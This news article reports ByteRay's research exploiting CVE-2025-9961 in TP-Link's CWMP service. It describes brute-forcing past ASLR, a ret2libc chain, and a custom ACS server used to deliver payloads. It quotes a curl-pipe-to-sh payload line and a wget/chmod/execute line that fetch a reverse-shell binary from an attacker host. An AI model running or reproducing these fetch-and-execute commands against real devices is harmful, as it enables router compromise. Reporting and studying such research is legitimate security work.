Image: ByteRay

Security researchers at ByteRay have published a detailed exploitation write-up of CVE-2025-9961, a vulnerability in TP-Link’s CWMP (CPE WAN Management Protocol) service that can be weaponized to achieve remote code execution (RCE) on affected devices. The work sheds light on both the technical complexity of exploitation and the persistence required to bypass mitigations such as ASLR and restricted payload delivery.

ByteRay’s team explained that their research required “direct interaction with the system to monitor logs, inspect configuration files, and set up GDB.” Instead of using UART, they leveraged a previously known flaw, CVE-2023-1389, to downgrade the firmware and gain the access needed to explore CVE-2025-9961.

Security mitigations were partially in place, including NX enabled and Partial RELRO, but the absence of stack canaries and PIE left exploitable gaps. As the report notes: “Stack: 10 bit fix, 10 bits, 12 bits”, which highlighted the ASLR entropy challenges the researchers needed to overcome.

The team’s initial proof-of-concept relied on GenieACS to deliver payloads, but the platform corrupted the byte range needed for reliable exploitation. As the researchers put it: “GenieACS could not faithfully transmit the full 0x00–0xFF byte range… This restriction forced a different approach — setup our custom ACS server!.”

By building their own ACS server, ByteRay was able to faithfully reproduce the CWMP protocol steps and deliver arbitrary payloads via SetParameterValues requests.

Because address leaks were not possible, exploitation required brute-forcing base addresses. ByteRay explains: “Brute-forcing introduces a new challenge: the CWMP service will crash (SIGSEGV) if the guessed base address is incorrect. However, this is manageable because we already have access to the TP-Link web panel, allowing us to restart the service.”

Despite this instability, the team successfully implemented a ret2libc attack using carefully selected ROP gadgets to call the system() function in libc.

The final stage of the exploit involved serving a malicious ARM32 ELF reverse shell. Using msfvenom, the researchers generated a payload and delivered it through a crafted curl command:

buf+= b"curl http://192.168.0.59:8000/show | sh"

The hosted show file instructed the device to download, chmod, and execute the backdoor binary:

wget http://[attacker]:8000/app -O /tmp/app && chmod +x /tmp/app && /tmp/app

The result was a fully functional reverse shell, proving CVE-2025-9961 can be exploited in real-world conditions.

ByteRay clarified that the research and PoC testing were carried out solely for research purposes and that the full exploit code has been made available for study. The PoC is published at GitHub.

Related Posts:

• PoC Code for Linux Kernel Privilege Escalation Flaw (CVE-2022-2602) Published
• Privilege Escalation Flaw in Popular Enlightenment Desktop for Linux
• Apache HTTP Server Request Splitting Flaw Gets Public PoC Exploit
• CISA Flags Two Actively Exploited Vulnerabilities: TP-Link Router Reset Flaw and WhatsApp Zero-Day Chain
• CISA Warns: Actively Exploited TP-Link Router Flaws Added to KEV Catalog